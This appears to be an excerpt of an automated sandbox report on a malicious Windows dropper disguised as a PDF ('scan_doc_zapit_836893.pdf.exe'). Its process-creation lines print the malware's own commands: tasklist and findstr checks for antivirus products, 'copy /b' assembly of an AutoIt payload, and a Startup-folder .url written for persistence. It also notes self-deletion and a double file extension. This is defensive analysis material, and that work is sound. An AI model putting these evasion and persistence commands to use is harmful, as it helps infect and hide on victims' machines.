Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_00736FE6 17_2_00736FE6
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_007233B7 17_2_007233B7
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_0071D45D 17_2_0071D45D
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_0072F409 17_2_0072F409
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_00701663 17_2_00701663
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_0071F628 17_2_0071F628
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_007216B4 17_2_007216B4
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_0070F6A0 17_2_0070F6A0
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_007278C3 17_2_007278C3
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_0072DBA5 17_2_0072DBA5
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_00721BA8 17_2_00721BA8
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_00739CE5 17_2_00739CE5
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_0071DD28 17_2_0071DD28
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_0072BFD6 17_2_0072BFD6
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_00721FC0 17_2_00721FC0
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\185027\Spy.pif D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: String function: 00728B30 appears 42 times
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: String function: 00711A36 appears 34 times
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: String function: 00720D17 appears 70 times
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: String function: 00A91A36 appears 34 times
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: String function: 00AA0D17 appears 70 times
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: String function: 00AA8B30 appears 42 times
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Code function: String function: 004062A3 appears 57 times
Sample file is different than original file name gathered from version info
Source: scan_doc_zapit_836893.pdf.exe, 00000000.00000003.2103831695.000000000291B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameAutoIt3.exeB vs scan_doc_zapit_836893.pdf.exe
Source: scan_doc_zapit_836893.pdf.exe, 00000000.00000002.2163034210.0000000000722000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCmd.Exej% vs scan_doc_zapit_836893.pdf.exe
Uses 32bit PE files
Source: scan_doc_zapit_836893.pdf.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engine Classification label: mal92.expl.evad.winEXE@28/17@2/0
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AEA6AD GetLastError,FormatMessageW, 11_2_00AEA6AD
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AD8DE9 AdjustTokenPrivileges,CloseHandle, 11_2_00AD8DE9
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AD9399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 11_2_00AD9399
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_00758DE9 AdjustTokenPrivileges,CloseHandle, 17_2_00758DE9
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_00759399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 17_2_00759399
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Code function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 0_2_004044A5
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AE4148 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle, 11_2_00AE4148
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Code function: 0_2_004024FB CoCreateInstance, 0_2_004024FB
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AE443D __swprintf,__swprintf,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx, 11_2_00AE443D
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif File created: C:\Users\user\AppData\Local\NanoSec Cryptographics Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2360:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3892:120:WilError_03
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe File created: C:\Users\user\AppData\Local\Temp\nsn992B.tmp Jump to behavior
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Yes Yes.bat & Yes.bat
Source: scan_doc_zapit_836893.pdf.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe File read: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe "C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe"
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Yes Yes.bat & Yes.bat
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 185027
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "venezuelalandscapesmeantposters" Tournaments
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Martin + ..\Organizing + ..\Finnish + ..\Determined + ..\Already + ..\Presentations + ..\Hint H
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Spy.pif H
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NanoCipher.url" & echo URL="C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NanoCipher.url" & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.js"
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr "C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr" "C:\Users\user\AppData\Local\NanoSec Cryptographics\o"
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Yes Yes.bat & Yes.bat Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 185027 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "venezuelalandscapesmeantposters" Tournaments Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Martin + ..\Organizing + ..\Finnish + ..\Determined + ..\Already + ..\Presentations + ..\Hint H Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Spy.pif H Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NanoCipher.url" & echo URL="C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NanoCipher.url" & exit Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr "C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr" "C:\Users\user\AppData\Local\NanoSec Cryptographics\o" Jump to behavior
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Section loaded: shfolder.dll Jump to behavior
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Section loaded: riched20.dll Jump to behavior
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Section loaded: usp10.dll Jump to behavior
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Section loaded: msls31.dll Jump to behavior
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cmdext.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: framedynos.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: framedynos.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\SysWOW64\choice.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: jscript.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: Window Recorder Window detected: More than 3 window changes detected
Source: scan_doc_zapit_836893.pdf.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Code function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress, 0_2_004062FC
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AA8B75 push ecx; ret 11_2_00AA8B88
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_00728B75 push ecx; ret 17_2_00728B88
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_0071CBDB push eax; retf 17_2_0071CBF8
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_0071CC06 push eax; retf 17_2_0071CBF8

Persistence and Installation Behavior
barindex
Drops PE files with a suspicious file extension
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif File created: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Jump to dropped file
Drops PE files
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif File created: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Jump to dropped file
Creates a start menu entry (Start Menu\Programs\Startup)
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NanoCipher.url Jump to behavior
Stores files to the Windows start menu directory
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NanoCipher.url Jump to behavior

Hooking and other Techniques for Hiding and Protection
barindex
Deletes itself after installation
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif File deleted: c:\users\user\desktop\scan_doc_zapit_836893.pdf.exe Jump to behavior
Uses an obfuscated file name to hide its real file extension (double extension)
Source: Possible double extension: pdf.exe Static PE information: scan_doc_zapit_836893.pdf.exe
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00B059B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 11_2_00B059B3
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00A95EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 11_2_00A95EDA
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_007859B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 17_2_007859B3
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_00715EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 17_2_00715EDA
Extensive use of GetProcAddress (often used to hide API calls)
